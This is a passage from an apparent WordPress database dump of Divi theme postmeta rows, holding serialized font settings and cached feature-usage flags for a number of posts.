900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32780,1068,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32781,1068,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32782,1068,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32775,1128,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32776,1099,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32777,1099,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32778,1099,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32771,1150,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32772,1128,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32773,1128,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32774,1128,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32767,829,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32768,1150,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32769,1150,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32770,1150,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32763,1215,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32764,829,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32765,829,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32766,829,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32759,1222,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32760,1215,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32761,1215,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32762,1215,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32755,1269,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32756,1222,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32757,1222,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32758,1222,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32751,1422,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32752,1269,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32753,1269,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32754,1269,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32747,1459,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32748,1422,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32749,1422,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32750,1422,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32746,1459,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32743,1477,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32744,1459,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32745,1459,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32739,906,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32740,1477,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32741,1477,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32742,1477,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32735,529,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32736,906,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32737,906,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32738,906,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32732,529,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32733,529,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32734,529,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32728,591,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32729,591,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32730,591,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s